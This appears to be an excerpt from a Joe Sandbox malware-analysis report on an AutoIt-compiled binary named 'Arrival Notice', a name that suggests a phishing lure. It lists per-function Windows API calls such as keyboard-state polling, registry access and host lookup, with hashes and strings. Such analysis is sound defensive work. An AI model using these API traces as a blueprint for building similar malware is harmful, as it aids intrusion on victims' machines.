                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                              • String ID:
                                              • API String ID: 2751501086-0
                                              • Opcode ID: 5228ef222ceb6f1570638235e8120e8866fe1d03683537be6a88c9be7f10527c
                                              • Instruction ID: 9a2cd65d1f3c659cbac32df0e509da6f9454a894e8b3c014bcad660c33da3088
                                              • Opcode Fuzzy Hash: 5228ef222ceb6f1570638235e8120e8866fe1d03683537be6a88c9be7f10527c
                                              • Instruction Fuzzy Hash: 90712770645209BFFB208F55DC89FAABF68FF45368F204216F515A61E1C7B1AC10DB90
                                              APIs
                                              • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00950038,?,?), ref: 009510BC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: BuffCharUpper
                                              • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                              • API String ID: 3964851224-909552448
                                              • Opcode ID: 7ca2330b5612b2297167b27a947e5a29615d188f074210b38decf3c03318c94b
                                              • Instruction ID: a95214c18fc70f1c7ff697f61253cb2b48a8c22c9f4b075f1ff0c0d58faf1d8e
                                              • Opcode Fuzzy Hash: 7ca2330b5612b2297167b27a947e5a29615d188f074210b38decf3c03318c94b
                                              • Instruction Fuzzy Hash: 39415B3015834E8BCF20FFA5D891AEA3764FF12301F544655EDA19B292DB34AD1ACB61
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0090E6C9,00000010,?,Bad directive syntax error,0095F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0092FCD2
                                              • LoadStringW.USER32(00000000,?,0090E6C9,00000010), ref: 0092FCD9
                                                • Part of subcall function 008D7F41: _memmove.LIBCMT ref: 008D7F82
                                              • _wprintf.LIBCMT ref: 0092FD0C
                                              • __swprintf.LIBCMT ref: 0092FD2E
                                              • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0092FD9D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                              • API String ID: 1506413516-4153970271
                                              • Opcode ID: 91de62f0b7f9d813a0a3a4b96489748ffeadfed5e3a42721fb5a2ec4ab735e7c
                                              • Instruction ID: 349e1b22a7d3c8653d47b3ddb00e8b6dabfdbcefe1adc328957bb0c15419ceca
                                              • Opcode Fuzzy Hash: 91de62f0b7f9d813a0a3a4b96489748ffeadfed5e3a42721fb5a2ec4ab735e7c
                                              • Instruction Fuzzy Hash: EF21B13290421EABCF22EFA4CC56EFE7739FF14704F040466F505A21A2EB719A18DB52
                                              APIs
                                                • Part of subcall function 008D7D2C: _memmove.LIBCMT ref: 008D7D66
                                                • Part of subcall function 008D7A84: _memmove.LIBCMT ref: 008D7B0D
                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 009355D2
                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 009355E8
                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009355F9
                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0093560B
                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0093561C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: SendString$_memmove
                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                              • API String ID: 2279737902-1007645807
                                              • Opcode ID: 93ec20d324fd1785b76fd7e9859aa17f91ec4f1613fd34804244d446a74ee58d
                                              • Instruction ID: 80320b10b32f745538a3090c05f33ddf6e413757b73ba5d043e913536d0a37ca
                                              • Opcode Fuzzy Hash: 93ec20d324fd1785b76fd7e9859aa17f91ec4f1613fd34804244d446a74ee58d
                                              • Instruction Fuzzy Hash: 6D11942055016979E720B665DC4ADFF7B7CFFD5F04F40056BB401E21D1EE641E05CAA2
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                              • String ID: 0.0.0.0
                                              • API String ID: 208665112-3771769585
                                              • Opcode ID: 8f16d0e0c4cd20bc23a142a99fb21193f4818f468d5e191353c08306ea3cdfaf
                                              • Instruction ID: 31b282a6ed3ab05f0ee6d4964ec7d9e6ef3c08333f871838dd7b31b4a58b59e9
                                              • Opcode Fuzzy Hash: 8f16d0e0c4cd20bc23a142a99fb21193f4818f468d5e191353c08306ea3cdfaf
                                              • Instruction Fuzzy Hash: 1511EB31918118ABCB20EB34EC4AFEB77BCEF44721F050176F505D6161EF759A819B52
                                              APIs
                                              • timeGetTime.WINMM ref: 0093521C
                                                • Part of subcall function 008F0719: timeGetTime.WINMM(?,7694B400,008E0FF9), ref: 008F071D
                                              • Sleep.KERNEL32(0000000A), ref: 00935248
                                              • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 0093526C
                                              • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0093528E
                                              • SetActiveWindow.USER32 ref: 009352AD
                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 009352BB
                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 009352DA
                                              • Sleep.KERNEL32(000000FA), ref: 009352E5
                                              • IsWindow.USER32 ref: 009352F1
                                              • EndDialog.USER32(00000000), ref: 00935302
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                              • String ID: BUTTON
                                              • API String ID: 1194449130-3405671355
                                              • Opcode ID: 1e64b250915191ec7f7c041fa7f0500bad8d321f1b6d30e103f15fa2547de7f4
                                              • Instruction ID: e9d76c599801249e69990f9e2c6ed9853b7001c8967ad21712aff18efbc1bed9
                                              • Opcode Fuzzy Hash: 1e64b250915191ec7f7c041fa7f0500bad8d321f1b6d30e103f15fa2547de7f4
                                              • Instruction Fuzzy Hash: 6C21C37022D704AFE7005BB5EC98B2B7B6DEB8A35BF060425F412821B1DB61DC40BF22
                                              APIs
                                                • Part of subcall function 008D9997: __itow.LIBCMT ref: 008D99C2
                                                • Part of subcall function 008D9997: __swprintf.LIBCMT ref: 008D9A0C
                                              • CoInitialize.OLE32(00000000), ref: 0093D855
                                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0093D8E8
                                              • SHGetDesktopFolder.SHELL32(?), ref: 0093D8FC
                                              • CoCreateInstance.OLE32(00962D7C,00000000,00000001,0098A89C,?), ref: 0093D948
                                              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0093D9B7
                                              • CoTaskMemFree.OLE32(?,?), ref: 0093DA0F
                                              • _memset.LIBCMT ref: 0093DA4C
                                              • SHBrowseForFolderW.SHELL32(?), ref: 0093DA88
                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0093DAAB
                                              • CoTaskMemFree.OLE32(00000000), ref: 0093DAB2
                                              • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0093DAE9
                                              • CoUninitialize.OLE32(00000001,00000000), ref: 0093DAEB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                              • String ID:
                                              • API String ID: 1246142700-0
                                              • Opcode ID: fe168db6f03784960e5f882b99d1bf93d5a47d6b64a9e15cdf7e581426d5bde8
                                              • Instruction ID: 188d1d9b1f6575fc805c3dd846bc6981d86f6d6d9476a8fb4fba71f00408a84a
                                              • Opcode Fuzzy Hash: fe168db6f03784960e5f882b99d1bf93d5a47d6b64a9e15cdf7e581426d5bde8
                                              • Instruction Fuzzy Hash: 60B1F975A00219AFDB04DFA5D898EAEBBB9FF48314F048469F506EB261DB30AD41CF51
                                              APIs
                                              • GetKeyboardState.USER32(?), ref: 009305A7
                                              • SetKeyboardState.USER32(?), ref: 00930612
                                              • GetAsyncKeyState.USER32(000000A0), ref: 00930632
                                              • GetKeyState.USER32(000000A0), ref: 00930649
                                              • GetAsyncKeyState.USER32(000000A1), ref: 00930678
                                              • GetKeyState.USER32(000000A1), ref: 00930689
                                              • GetAsyncKeyState.USER32(00000011), ref: 009306B5
                                              • GetKeyState.USER32(00000011), ref: 009306C3
                                              • GetAsyncKeyState.USER32(00000012), ref: 009306EC
                                              • GetKeyState.USER32(00000012), ref: 009306FA
                                              • GetAsyncKeyState.USER32(0000005B), ref: 00930723
                                              • GetKeyState.USER32(0000005B), ref: 00930731
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: State$Async$Keyboard
                                              • String ID:
                                              • API String ID: 541375521-0
                                              • Opcode ID: 7d8aa5143ee2937812e3f03efd267fa14e0b1b75248a5c4a5982c59fc4db10c9
                                              • Instruction ID: 50ccd1a8150bb4a8286277c35cd9580d30ede7a86c8b3d3d72a616d643a340e9
                                              • Opcode Fuzzy Hash: 7d8aa5143ee2937812e3f03efd267fa14e0b1b75248a5c4a5982c59fc4db10c9
                                              • Instruction Fuzzy Hash: CD511C60A0878829FB34DBB088757EABFB89F81380F08459DD5C2571C2DA64DB4CCF65
                                              APIs
                                              • GetDlgItem.USER32(?,00000001), ref: 0092C746
                                              • GetWindowRect.USER32(00000000,?), ref: 0092C758
                                              • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0092C7B6
                                              • GetDlgItem.USER32(?,00000002), ref: 0092C7C1
                                              • GetWindowRect.USER32(00000000,?), ref: 0092C7D3
                                              • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0092C827
                                              • GetDlgItem.USER32(?,000003E9), ref: 0092C835
                                              • GetWindowRect.USER32(00000000,?), ref: 0092C846
                                              • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0092C889
                                              • GetDlgItem.USER32(?,000003EA), ref: 0092C897
                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0092C8B4
                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0092C8C1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Window$ItemMoveRect$Invalidate
                                              • String ID:
                                              • API String ID: 3096461208-0
                                              • Opcode ID: f0d8a6904a55f76cc8ced231efacce4701a58ca36abc7b403393635f03c6a1b7
                                              • Instruction ID: ee36cd5273971fccbbe29ec03b327a54cbadd5843a4e6df41afdef45403ec2bc
                                              • Opcode Fuzzy Hash: f0d8a6904a55f76cc8ced231efacce4701a58ca36abc7b403393635f03c6a1b7
                                              • Instruction Fuzzy Hash: F6512FB1B10209AFDF18CFA9DD99AAEBBBAEB88311F14812DF515D7294D7709D008B50
                                              APIs
                                                • Part of subcall function 008D1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,008D2036,?,00000000,?,?,?,?,008D16CB,00000000,?), ref: 008D1B9A
                                              • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 008D20D3
                                              • KillTimer.USER32(-00000001,?,?,?,?,008D16CB,00000000,?,?,008D1AE2,?,?), ref: 008D216E
                                              • DestroyAcceleratorTable.USER32(00000000), ref: 0090BEF6
                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008D16CB,00000000,?,?,008D1AE2,?,?), ref: 0090BF27
                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008D16CB,00000000,?,?,008D1AE2,?,?), ref: 0090BF3E
                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008D16CB,00000000,?,?,008D1AE2,?,?), ref: 0090BF5A
                                              • DeleteObject.GDI32(00000000), ref: 0090BF6C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                              • String ID:
                                              • API String ID: 641708696-0
                                              • Opcode ID: d0be54da5a1d3b47206ee63a0a16fae6172362372c11e45f68308182d1345207
                                              • Instruction ID: 734fc19d3c193a9710e8f1bd9823ed642188231f67e2c32d04b6ee174b5d206d
                                              • Opcode Fuzzy Hash: d0be54da5a1d3b47206ee63a0a16fae6172362372c11e45f68308182d1345207
                                              • Instruction Fuzzy Hash: 60619D31118715DFCB25AF1ACD58B29B7F1FF60326F10862AE542876A0C771AC80EF51
                                              APIs
                                                • Part of subcall function 008D25DB: GetWindowLongW.USER32(?,000000EB), ref: 008D25EC
                                              • GetSysColor.USER32(0000000F), ref: 008D21D3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: ColorLongWindow
                                              • String ID:
                                              • API String ID: 259745315-0
                                              • Opcode ID: eeea387df8b71074010389edf2b4dcb381aacfc07fd163d1f32f80a97cb27a24
                                              • Instruction ID: c0ea6cff6a20cc939848548d6d8e9a2cb02019877bb5f971e0de3a8e377aa5dd
                                              • Opcode Fuzzy Hash: eeea387df8b71074010389edf2b4dcb381aacfc07fd163d1f32f80a97cb27a24
                                              • Instruction Fuzzy Hash: 064190311086449FDB215F29DC58BB97B66FB16332F144366FD65CA2E2C7318C42EB61
                                              APIs
                                              • CharLowerBuffW.USER32(?,?,0095F910), ref: 0093AB76
                                              • GetDriveTypeW.KERNEL32(00000061,0098A620,00000061), ref: 0093AC40
                                              • _wcscpy.LIBCMT ref: 0093AC6A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: BuffCharDriveLowerType_wcscpy
                                              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                              • API String ID: 2820617543-1000479233
                                              • Opcode ID: 45280b8ad8d603025d107cc81811377d91e71925df0742f57a4b8dc59b1f593e
                                              • Instruction ID: f3da8230815c4fb4ddfb50f7bfa166cf5d31fbb939ea40ef5b41e0e1955d8c6a
                                              • Opcode Fuzzy Hash: 45280b8ad8d603025d107cc81811377d91e71925df0742f57a4b8dc59b1f593e
                                              • Instruction Fuzzy Hash: 255199301083059FC720EF28C891AAEB7A9FF91304F10492AF4D6972A2EB359D49CB53
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: __i64tow__itow__swprintf
                                              • String ID: %.15g$0x%p$False$True
                                              • API String ID: 421087845-2263619337
                                              • Opcode ID: 215c86eabe379f132ff24836810a450d366f0d53c071527d1601ea01004a17b0
                                              • Instruction ID: b5cb0fb94b00cd52971abd8eae64cc580988c75daadd93aa8b48d5ce5b0c08cc
                                              • Opcode Fuzzy Hash: 215c86eabe379f132ff24836810a450d366f0d53c071527d1601ea01004a17b0
                                              • Instruction Fuzzy Hash: 9D41F271604209BEEB34AB38D852F7A77E8FB44304F20456FE689D7391EE3199418B12
                                              APIs
                                              • _memset.LIBCMT ref: 009573D9
                                              • CreateMenu.USER32 ref: 009573F4
                                              • SetMenu.USER32(?,00000000), ref: 00957403
                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00957490
                                              • IsMenu.USER32(?), ref: 009574A6
                                              • CreatePopupMenu.USER32 ref: 009574B0
                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 009574DD
                                              • DrawMenuBar.USER32 ref: 009574E5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                              • String ID: 0$F
                                              • API String ID: 176399719-3044882817
                                              • Opcode ID: 4ee17ec899e79d31822ad28f39cbfef396cff8857683bce66e593686b1d4846d
                                              • Instruction ID: 7e1c30c7c52951f28f24f3d440d45074c3dcdd390505862432e48b058cf34ea0
                                              • Opcode Fuzzy Hash: 4ee17ec899e79d31822ad28f39cbfef396cff8857683bce66e593686b1d4846d
                                              • Instruction Fuzzy Hash: 2E416A74A04205EFDB10DFAAE884EAABBFAFF49351F140429FD0597360D730AA14DB50
                                              APIs
                                              • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 009577CD
                                              • CreateCompatibleDC.GDI32(00000000), ref: 009577D4
                                              • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 009577E7
                                              • SelectObject.GDI32(00000000,00000000), ref: 009577EF
                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 009577FA
                                              • DeleteDC.GDI32(00000000), ref: 00957803
                                              • GetWindowLongW.USER32(?,000000EC), ref: 0095780D
                                              • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00957821
                                              • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0095782D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                              • String ID: static
                                              • API String ID: 2559357485-2160076837
                                              • Opcode ID: 337d4a1737100f9ec8bc6f8c37f32933c4e017e917c49e704a051e569f744462
                                              • Instruction ID: 6c468aa79ffa58a1329e084202f6026935e123e68e016afa7a056191bdfdc5de
                                              • Opcode Fuzzy Hash: 337d4a1737100f9ec8bc6f8c37f32933c4e017e917c49e704a051e569f744462
                                              • Instruction Fuzzy Hash: BA319C32119214ABDF119FA6EC18FDA3B6DEF0D332F100224FA15920A0C7319815EBA4
                                              APIs
                                              • _memset.LIBCMT ref: 008F707B
                                                • Part of subcall function 008F8D68: __getptd_noexit.LIBCMT ref: 008F8D68
                                              • __gmtime64_s.LIBCMT ref: 008F7114
                                              • __gmtime64_s.LIBCMT ref: 008F714A
                                              • __gmtime64_s.LIBCMT ref: 008F7167
                                              • __allrem.LIBCMT ref: 008F71BD
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008F71D9
                                              • __allrem.LIBCMT ref: 008F71F0
